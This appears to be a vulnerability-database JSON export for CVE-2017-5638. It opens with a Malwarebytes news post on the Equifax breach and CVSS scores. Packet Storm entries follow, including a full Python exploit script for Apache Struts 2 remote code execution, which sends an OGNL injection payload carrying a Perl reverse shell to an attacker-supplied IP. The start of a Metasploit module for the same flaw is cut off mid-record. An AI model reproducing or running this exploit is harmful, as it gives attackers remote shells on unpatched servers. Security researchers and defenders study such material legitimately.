([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) that was used in this breach after several days of intense scrutiny around Apache Struts. To make matters worse, there already was a patch available for this flaw in March 2017, two months prior to the incident.\n\n_**1) Updated information on U.S. website application vulnerability.**_ \n_Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement._\n\n### [updates 9/12/2017]\n\nEquifax's efforts in response to this incident can be followed at www.equifaxsecurity2017.com, but the[ site has been called](<https://krebsonsecurity.com/2017/09/equifax-breach-response-turns-dumpster-fire/>) \"completely broken at best, and little more than a stalling tactic or sham at worst.\" And [ isn\u2019t working for many people](<https://www.businessinsider.nl/equifax-data-breach-site-check-angry-response-2017-9/>). So, we leave it up to your best judgment whether you should pay that site a visit .\n\nOver 30 lawsuits have been filed against Equifax following the breach [according to Reuters](<http://www.reuters.com/article/us-equifax-cyber-lawsuits/lawsuits-against-equifax-pile-up-after-massive-data-breach-idUSKCN1BM2E3>).\n\n[Quartz reported](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) that the vulnerability they mentioned was in a popular open-source software package called Apache Struts, which is a programming framework for building web applications in Java. Two vulnerabilities in Struts have been discovered so far in 2017. 
The vulnerability announced on Sept. 4 has existed in Struts since 2008.\n\nApache responded to that report with [this Apache Struts Statement on Equifax Security Breach](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>).\n\n \n\nOn July 29, 2017, Equifax discovered that attackers had gained unauthorized access to private data belonging to an estimated 143 million Americans by exploiting a vulnerability in a website application. It is unknown at this point whether said vulnerability was a zero-day or had already been patched. The former would indicate that other companies could have also been attacked, while the latter would reflect on Equifax's overall security posture.\n\n[According to Equifax](<https://www.equifaxsecurity2017.com/frequently-asked-questions/>), online criminals maintained their presence from mid-May through July 2017 and had access to:\n\n * Names\n * Social Security numbers\n * Birth dates\n * Addresses\n * Driver\u2019s license numbers (in some cases)\n * Credit card numbers (for approx. 209,000 U.S. consumers)\n\nIt also said that some personal information for certain UK and Canadian residents was part of this breach.\n\nThis is obviously bad news for consumers and it will only increase the lack of trust they have towards corporations that collect and store their data. It also serves as a reminder that there are ways to be proactive and exercise your right to have access to your information and put certain restrictions in place to make identity theft harder.\n\nEquifax is offering a free identity theft protection and credit file monitoring to all of its U.S. customers while still investigating the intrusion, working along with a private firm and law enforcement. 
More information about this breach and how to apply for ID theft protection can be found by going to [equifaxsecurity2017.com](<https://www.equifaxsecurity2017.com/>), a website Equifax has just set up.\n\nThe post [Equifax breach: What you need to know [updated]](<https://blog.malwarebytes.com/cybercrime/2017/09/equifax-breach-what-you-need-to-know/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-09-08T07:02:47", "type": "malwarebytes", "title": "Equifax breach: What you need to know [updated]", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-09-08T07:02:47", "id": "MALWAREBYTES:4993027161793E66024E0B42522BB53D", "href": "https://blog.malwarebytes.com/cybercrime/2017/09/equifax-breach-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2017-03-12T01:15:38", "description": "", "cvss3": {}, "published": "2017-03-10T00:00:00", "type": "packetstorm", "title": "Apache Struts 2 2.3.x / 2.5.x Remote Code 
Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T00:00:00", "id": "PACKETSTORM:141576", "href": "https://packetstormsecurity.com/files/141576/Apache-Struts-2-2.3.x-2.5.x-Remote-Code-Execution.html", "sourceData": "`# CVE-2017-5638 \n# Apache Struts 2 Vulnerability Remote Code Execution \n# Reverse shell from target \n# Author: anarc0der - github.com/anarcoder \n# Tested with tomcat8 \n \n# Install tomcat8 \n# Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638 \n \n# Ex: \n# Open: $ nc -lnvp 4444 \n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --port=4444 \n \n\"\"\" \nUsage: \nstruntsrce.py --target=<arg> --ip=<arg> --port=<arg> \nstruntsrce.py --help \nstruntsrce.py --version \n \nOptions: \n-h --help Open help menu \n-v --version Show version \nRequired options: \n--target='url target' your target :) \n--ip='10.10.10.1' your ip \n--port=4444 open port for back connection \n \n\"\"\" \n \nimport urllib2 \nimport httplib \nimport os \nimport sys \nfrom docopt import docopt, DocoptExit \n \n \nclass CVE_2017_5638(): \n \ndef __init__(self, p_target, p_ip, p_port): \nself.target = p_target \nself.ip = p_ip \nself.port = p_port \nself.revshell = self.generate_revshell() \nself.payload = self.generate_payload() \nself.exploit() \n \ndef generate_revshell(self): \nrevshell = \"perl -e \\\\'use Socket;$i=\\\"{0}\\\";$p={1};\"\\ \n\"socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));\"\\ \n\"if(connect(S,sockaddr_in($p,inet_aton($i)))){{open\"\\ \n\"(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");\"\\ \n\"open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh -i\\\");}};\\\\'\" \nreturn revshell.format(self.ip, self.port) \n \ndef generate_payload(self): \npayload = \"%{{(#_='multipart/form-data').\"\\ \n\"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\"\\ \n\"(#_memberAccess?\"\\ \n\"(#_memberAccess=#dm):\"\\ 
\n\"((#container=#context['com.opensymphony.xwork2.\"\\ \n\"ActionContext.container']).\"\\ \n\"(#ognlUtil=#container.getInstance(@com.opensymphony.\"\\ \n\"xwork2.ognl.OgnlUtil@class)).\"\\ \n\"(#ognlUtil.getExcludedPackageNames().clear()).\"\\ \n\"(#ognlUtil.getExcludedClasses().clear()).\"\\ \n\"(#context.setMemberAccess(#dm)))).\"\\ \n\"(#cmd='{0}').\"\\ \n\"(#iswin=(@java.lang.System@getProperty('os.name').\"\\ \n\"toLowerCase().contains('win'))).\"\\ \n\"(#cmds=(#iswin?{{'cmd.exe','/c',#cmd}}:\"\\ \n\"{{'/bin/bash','-c',#cmd}})).\"\\ \n\"(#p=new java.lang.ProcessBuilder(#cmds)).\"\\ \n\"(#p.redirectErrorStream(true)).(#process=#p.start()).\"\\ \n\"(#ros=(@org.apache.struts2.ServletActionContext@get\"\\ \n\"Response().getOutputStream())).\"\\ \n\"(@org.apache.commons.io.IOUtils@copy\"\\ \n\"(#process.getInputStream(),#ros)).(#ros.flush())}}\" \nreturn payload.format(self.revshell) \n \ndef exploit(self): \ntry: \n# Set proxy for debug request, just uncomment these lines \n# Change the proxy port \n \n#proxy = urllib2.ProxyHandler({'http': '127.0.0.1:8081'}) \n#opener = urllib2.build_opener(proxy) \n#urllib2.install_opener(opener) \n \nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64)' \n' AppleWebKit/537.36 (KHTML, like Gecko)' \n' Chrome/55.0.2883.87 Safari/537.36', \n'Content-Type': self.payload} \nxpl = urllib2.Request(self.target, headers=headers) \nbody = urllib2.urlopen(xpl).read() \nexcept httplib.IncompleteRead as b: \nbody = b.partial \nprint body \n \n \ndef main(): \ntry: \narguments = docopt(__doc__, version=\"Apache Strunts RCE Exploit\") \ntarget = arguments['--target'] \nip = arguments['--ip'] \nport = arguments['--port'] \nexcept DocoptExit as e: \nos.system('python struntsrce.py --help') \nsys.exit(1) \n \nCVE_2017_5638(target, ip, port) \n \n \nif __name__ == '__main__': \nmain() \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/141576/struntsrce.py.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": 
"2017-03-15T01:15:35", "description": "", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "packetstorm", "title": "Apache Struts Jakarta Multipart Parser OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T00:00:00", "id": "PACKETSTORM:141630", "href": "https://packetstormsecurity.com/files/141630/Apache-Struts-Jakarta-Multipart-Parser-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts Jakarta Multipart Parser OGNL Injection', \n'Description' => %q{ \nThis module exploits a remote code execution vunlerability in Apache Struts \nversion 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed \nvia http Content-Type header. \n \nNative payloads will be converted to executables and dropped in the \nserver's temp dir. If this fails, try a cmd/* payload, which won't \nhave to write to the disk. \n}, \n'Author' => [ \n'Nike.Zheng', # PoC \n'Nixawk', # Metasploit module \n'Chorder', # Metasploit module \n'egypt', # combining the above \n'Jeffrey Martin', # Java fu \n], \n'References' => [ \n['CVE', '2017-5638'], \n['URL', 'http